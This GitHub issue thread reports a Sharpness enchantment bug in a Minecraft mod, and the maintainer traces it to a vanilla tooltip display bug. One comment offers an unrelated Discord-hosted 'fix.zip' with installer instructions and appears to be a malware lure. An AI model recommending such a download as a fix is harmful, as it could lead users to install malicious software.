### ISSUE TITLE
Sharpness enchantment isn't working

### ISSUE THREAD

**Issue by Mehmet494** [Autovw/AdvancedNetherite#56]
**Describe the bug**
Sharpness enchantment isn't working

**Expected behavior**
sharpness enchantment work

**Screenshots**
![Screenshot_25](https://github.com/user-attachments/assets/486a09bd-a996-4e84-a176-04abae21a6bf)
![Screenshot_26](https://github.com/user-attachments/assets/56e3979c-4c36-419c-b2ed-8f08a5add686)

**Technical Information (please complete the following information):**
 ! Please provide the actual version, not just 'latest'.
 - Minecraft-version: [1.21.1]
 - ModLoader-version: [Forge 52.0.9]
 - Mod-version: [2.1.6]

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by Mehmet494** [comment]
> try this https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538& select the desired compiler in the installer

where did you find this

**Comment by Autovw** [comment]
This is an issue with Minecraft itself (see https://bugs.mojang.com/browse/MC-271840). The sharpness still works but it doesn't display properly on the item tooltip.
